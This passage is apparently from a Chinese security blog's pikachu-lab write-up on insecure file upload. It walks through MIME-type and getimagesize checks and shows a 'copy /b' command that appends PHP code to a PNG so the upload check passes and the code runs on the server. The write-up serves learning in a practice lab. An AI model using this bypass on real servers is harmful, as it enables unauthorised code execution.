class="string">'tmp_name'</span>],$save_path.$_FILES[$key][<span class="string">'name'</span>]))&#123;</span><br><span class="line">        $return_data[<span class="string">'error'</span>]=<span class="string">'临时文件移动失败，请检查权限!'</span>;</span><br><span class="line">        $return_data[<span class="string">'return'</span>]=<span class="keyword">false</span>;</span><br><span class="line">        <span class="keyword">return</span> $return_data;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//如果以上都通过了，则返回这些值，存储的路径，新的文件名（不要暴露出去）</span></span><br><span class="line">    $return_data[<span class="string">'new_path'</span>]=$save_path.$_FILES[$key][<span class="string">'name'</span>];</span><br><span class="line">    $return_data[<span class="string">'return'</span>]=<span class="keyword">true</span>;</span><br><span class="line">    <span class="keyword">return</span> $return_data;</span><br><span class="line">    </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>只是对mime类型做了简单验证，并没有对文件进行严格的文件类型的验证，产生漏洞。</p>
<h3 id="0x03-getimagesize"><a href="#0x03-getimagesize" class="headerlink" title="0x03 getimagesize"></a>0x03 getimagesize</h3><p>服务器使用upload函数对图片进行验证。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">$html=<span class="string">''</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>]))&#123;</span><br><span class="line">    $type=<span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'jpeg'</span>,<span class="string">'png'</span>);<span class="comment">//指定类型</span></span><br><span class="line">    $mime=<span class="keyword">array</span>(<span class="string">'image/jpg'</span>,<span class="string">'image/jpeg'</span>,<span class="string">'image/png'</span>);</span><br><span class="line">    $save_path=<span class="string">'uploads'</span>.date(<span class="string">'/Y/m/d/'</span>);<span class="comment">//根据当天日期生成一个文件夹</span></span><br><span class="line">    $upload=upload(<span class="string">'uploadfile'</span>,<span class="string">'512000'</span>,$type,$mime,$save_path);<span class="comment">//调用函数</span></span><br><span class="line">    <span class="keyword">if</span>($upload[<span class="string">'return'</span>])&#123;</span><br><span class="line">        $html.=<span class="string">"&lt;p class='notice'&gt;文件上传成功&lt;/p&gt;&lt;p class='notice'&gt;文件保存的路径为：&#123;$upload['save_path']&#125;&lt;/p&gt;"</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        $html.=<span class="string">"&lt;p class=notice&gt;&#123;$upload['error']&#125;&lt;/p&gt;"</span>;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>upload函数：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">upload</span><span class="params">($key,$size,$type=array<span class="params">()</span>,$mime=array<span class="params">()</span>,$save_path)</span></span>&#123;</span><br><span class="line">    $arr_errors=<span class="keyword">array</span>(</span><br><span class="line">        <span class="number">1</span>=&gt;<span class="string">'上传的文件超过了 php.ini中 upload_max_filesize 选项限制的值'</span>,</span><br><span class="line">        <span class="number">2</span>=&gt;<span class="string">'上传文件的大小超过了 HTML 表单中 MAX_FILE_SIZE 选项指定的值'</span>,</span><br><span class="line">        <span class="number">3</span>=&gt;<span class="string">'文件只有部分被上传'</span>,</span><br><span class="line">        <span class="number">4</span>=&gt;<span class="string">'没有文件被上传'</span>,</span><br><span class="line">        <span class="number">6</span>=&gt;<span class="string">'找不到临时文件夹'</span>,</span><br><span class="line">        <span class="number">7</span>=&gt;<span class="string">'文件写入失败'</span></span><br><span class="line">    );</span><br><span class="line"><span class="comment">//     var_dump($_FILES);</span></span><br><span class="line">    <span class="keyword">if</span>(!<span class="keyword">isset</span>($_FILES[$key][<span class="string">'error'</span>]))&#123;</span><br><span class="line">        $return_data[<span class="string">'error'</span>]=<span class="string">'请选择上传文件！'</span>;</span><br><span class="line">        $return_data[<span class="string">'return'</span>]=<span class="keyword">false</span>;</span><br><span class="line">        <span class="keyword">return</span> $return_data;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ($_FILES[$key][<span class="string">'error'</span>]!=<span class="number">0</span>) &#123;</span><br><span class="line">        $return_data[<span class="string">'error'</span>]=$arr_errors[$_FILES[$key][<span class="string">'error'</span>]];</span><br><span class="line">        $return_data[<span class="string">'return'</span>]=<span class="keyword">false</span>;</span><br><span class="line">        <span class="keyword">return</span> $return_data;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//验证上传方式</span></span><br><span class="line">    <span class="keyword">if</span>(!is_uploaded_file($_FILES[$key][<span class="string">'tmp_name'</span>]))&#123;</span><br><span class="line">        $return_data[<span class="string">'error'</span>]=<span class="string">'您上传的文件不是通过 HTTP POST方式上传的！'</span>;</span><br><span class="line">        $return_data[<span class="string">'return'</span>]=<span class="keyword">false</span>;</span><br><span class="line">        <span class="keyword">return</span> $return_data;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//获取后缀名，如果不存在后缀名，则将变量设置为空</span></span><br><span class="line">    $arr_filename=pathinfo($_FILES[$key][<span class="string">'name'</span>]);</span><br><span class="line">    <span class="keyword">if</span>(!<span class="keyword">isset</span>($arr_filename[<span class="string">'extension'</span>]))&#123;</span><br><span class="line">        $arr_filename[<span class="string">'extension'</span>]=<span class="string">''</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//先验证后缀名</span></span><br><span class="line">    <span class="keyword">if</span>(!in_array(strtolower($arr_filename[<span class="string">'extension'</span>]),$type))&#123;<span class="comment">//转换成小写，在比较</span></span><br><span class="line">        $return_data[<span class="string">'error'</span>]=<span class="string">'上传文件的后缀名不能为空，且必须是'</span>.implode(<span class="string">','</span>,$type).<span class="string">'中的一个'</span>;</span><br><span class="line">        $return_data[<span class="string">'return'</span>]=<span class="keyword">false</span>;</span><br><span class="line">        <span class="keyword">return</span> $return_data;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">//验证MIME类型，MIME类型可以被绕过</span></span><br><span class="line">    <span class="keyword">if</span>(!in_array($_FILES[$key][<span class="string">'type'</span>], $mime))&#123;</span><br><span class="line">        $return_data[<span class="string">'error'</span>]=<span class="string">'你上传的是个假图片，不要欺骗我xxx！'</span>;</span><br><span class="line">        $return_data[<span class="string">'return'</span>]=<span class="keyword">false</span>;</span><br><span class="line">        <span class="keyword">return</span> $return_data;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//通过getimagesize来读取图片的属性，从而判断是不是真实的图片，还是可以被绕过的</span></span><br><span class="line">    <span class="keyword">if</span>(!getimagesize($_FILES[$key][<span class="string">'tmp_name'</span>]))&#123;</span><br><span class="line">        $return_data[<span class="string">'error'</span>]=<span class="string">'你上传的是个假图片，不要欺骗我！'</span>;</span><br><span class="line">        $return_data[<span class="string">'return'</span>]=<span class="keyword">false</span>;</span><br><span class="line">        <span class="keyword">return</span> $return_data;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//验证大小</span></span><br><span class="line">    <span class="keyword">if</span>($_FILES[$key][<span class="string">'size'</span>]&gt;$size)&#123;</span><br><span class="line">        $return_data[<span class="string">'error'</span>]=<span class="string">'上传文件的大小不能超过'</span>.$size.<span class="string">'byte(500kb)'</span>;</span><br><span class="line">        $return_data[<span class="string">'return'</span>]=<span class="keyword">false</span>;</span><br><span class="line">        <span class="keyword">return</span> $return_data;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//把上传的文件给他搞一个新的路径存起来</span></span><br><span class="line">    <span class="keyword">if</span>(!file_exists($save_path))&#123;</span><br><span class="line">        <span class="keyword">if</span>(!mkdir($save_path,<span class="number">0777</span>,<span class="keyword">true</span>))&#123;</span><br><span class="line">            $return_data[<span class="string">'error'</span>]=<span class="string">'上传文件保存目录创建失败，请检查权限!'</span>;</span><br><span class="line">            $return_data[<span class="string">'return'</span>]=<span class="keyword">false</span>;</span><br><span class="line">            <span class="keyword">return</span> $return_data;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//生成一个新的文件名，并将新的文件名和之前获取的扩展名合起来，形成文件名称</span></span><br><span class="line">    $new_filename=str_replace(<span class="string">'.'</span>,<span class="string">''</span>,uniqid(mt_rand(<span class="number">100000</span>,<span class="number">999999</span>),<span class="keyword">true</span>));</span><br><span class="line">    <span class="keyword">if</span>($arr_filename[<span class="string">'extension'</span>]!=<span class="string">''</span>)&#123;</span><br><span class="line">        $arr_filename[<span class="string">'extension'</span>]=strtolower($arr_filename[<span class="string">'extension'</span>]);<span class="comment">//小写保存</span></span><br><span class="line">        $new_filename.=<span class="string">".&#123;$arr_filename['extension']&#125;"</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//将tmp目录里面的文件拷贝到指定目录下并使用新的名称</span></span><br><span class="line">    $save_path=rtrim($save_path,<span class="string">'/'</span>).<span class="string">'/'</span>;</span><br><span class="line">    <span class="keyword">if</span>(!move_uploaded_file($_FILES[$key][<span class="string">'tmp_name'</span>],$save_path.$new_filename))&#123;</span><br><span class="line">        $return_data[<span class="string">'error'</span>]=<span class="string">'临时文件移动失败，请检查权限!'</span>;</span><br><span class="line">        $return_data[<span class="string">'return'</span>]=<span class="keyword">false</span>;</span><br><span class="line">        <span class="keyword">return</span> $return_data;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//如果以上都通过了，则返回这些值，存储的路径，新的文件名（不要暴露出去）</span></span><br><span class="line">    $return_data[<span class="string">'save_path'</span>]=$save_path.$new_filename;</span><br><span class="line">    $return_data[<span class="string">'filename'</span>]=$new_filename;</span><br><span class="line">    $return_data[<span class="string">'return'</span>]=<span class="keyword">true</span>;</span><br><span class="line">    <span class="keyword">return</span> $return_data;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>这里的getimagesize函数需要注意。看一下实例;</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$remote_png_url = <span class="string">'http://www.runoob.com/wp-content/themes/w3cschool.cc/assets/img/logo-domain-green2.png'</span>;</span><br><span class="line">$img_data = getimagesize($remote_png_url);</span><br><span class="line">print_r($img_data );</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>以上实例输出结果为：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">Array</span></span><br><span class="line">(</span><br><span class="line">    [<span class="number">0</span>] =&gt; <span class="number">290</span></span><br><span class="line">    [<span class="number">1</span>] =&gt; <span class="number">69</span></span><br><span class="line">    [<span class="number">2</span>] =&gt; <span class="number">3</span></span><br><span class="line">    [<span class="number">3</span>] =&gt; width=<span class="string">"290"</span> height=<span class="string">"69"</span></span><br><span class="line">    [bits] =&gt; <span class="number">8</span></span><br><span class="line">    [mime] =&gt; image/png</span><br><span class="line">)</span><br></pre></td></tr></table></figure>
<p>返回结果说明</p>
<ul>
<li>索引 0 给出的是图像宽度的像素值</li>
<li>索引 1 给出的是图像高度的像素值</li>
<li>索引 2 给出的是图像的类型，返回的是数字，其中1 = GIF，2 = JPG，3 = PNG，4 = SWF，5 = PSD，6 =  BMP，7 = TIFF(intel byte order)，8 = TIFF(motorola byte order)，9 = JPC，10 =  JP2，11 = JPX，12 = JB2，13 = SWC，14 = IFF，15 = WBMP，16 = XBM</li>
<li>索引 3 给出的是一个宽度和高度的字符串，可以直接用于 HTML 的 <image> 标签</image></li>
<li>索引 bits 给出的是图像的每种颜色的位数，二进制格式</li>
<li>索引 channels 给出的是图像的通道值，RGB 图像默认是 3</li>
<li>索引 mime 给出的是图像的 MIME 信息，此信息可以用来在 HTTP Content-type 头信息中发送正确的信息，如： header(“Content-type: image/jpeg”);</li>
</ul>
<p>主要注意getimagesize可以返回图片的类型。</p>
<p>那么它是如何判断图片类型的呢？</p>
<p>他其实是对图片文件头（幻数）进行校验。这里就想到图种的操作。</p>
<p>在windows下合并图片以及php代码：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">copy /b <span class="number">9</span>.PNG+<span class="string">"test (1).php"</span> <span class="number">1</span>.jpg</span><br></pre></td></tr></table></figure>
<p>注意php文件在后。</p>
<p>上传正常，返回了url，访问即可执行一些php代码。</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-25_15-41-06.png" alt></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/web安全/" rel="tag"># web安全</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/07/24/pikachu漏洞平台学习（5）/" rel="next" title="pikachu漏洞平台学习(5)">
                <i class="fa fa-chevron-left"></i> pikachu漏洞平台学习(5)
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/07/27/pikachu漏洞平台学习（7）/" rel="prev" title="pikachu漏洞平台学习（7）">
                pikachu漏洞平台学习（7） <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/uploads/pikachu.jpg" alt="srat1999">
            
              <p class="site-author-name" itemprop="name">srat1999</p>
              <p class="site-description motion-element" itemprop="description">the higher you stand the more you can see</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">55</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">13</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">30</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/srat1999" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:srat1999@163.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#文件包含"><span class="nav-number">1.</span> <span class="nav-text">文件包含</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#概述"><span class="nav-number">1.0.1.</span> <span class="nav-text">概述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-本地文件包含"><span class="nav-number">1.0.2.</span> <span class="nav-text">0x01 本地文件包含</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-远程文件包含"><span class="nav-number">1.0.3.</span> <span class="nav-text">0x02 远程文件包含</span></a></li></ol></li></ol><li class="nav-item nav-level-1"><a class="nav-link" href="#不安全的文件下载"><span class="nav-number">2.</span> <span class="nav-text">不安全的文件下载</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#概述-1"><span class="nav-number">2.0.1.</span> <span class="nav-text">概述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-举例"><span class="nav-number">2.0.2.</span> <span class="nav-text">0x01 举例</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#不安全的文件上传"><span class="nav-number">3.</span> <span class="nav-text">不安全的文件上传</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#概述-2"><span class="nav-number">3.0.1.</span> <span class="nav-text">概述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-client-check"><span class="nav-number">3.0.2.</span> <span class="nav-text">0x01 client check</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-MIME-type"><span class="nav-number">3.0.3.</span> <span class="nav-text">0x02 MIME type</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03-getimagesize"><span class="nav-number">3.0.4.</span> <span class="nav-text">0x03 getimagesize</span></a></li></ol></li></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">srat1999</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">70.1k</span>
  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







  <div>
    <script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");document.write(unescape("%3Cspan id='cnzz_stat_icon_1278555274'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s4.cnzz.com/z_stat.php%3Fid%3D1278555274%26show%3Dpic' type='text/javascript'%3E%3C/script%3E"));</script>
    <script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");document.write(unescape("%3Cspan id='cnzz_stat_icon_1278555274'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s4.cnzz.com/z_stat.php%3Fid%3D1278555274%26online%3D1%26show%3Dline' type='text/javascript'%3E%3C/script%3E"));</script>
  </div>
 



        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
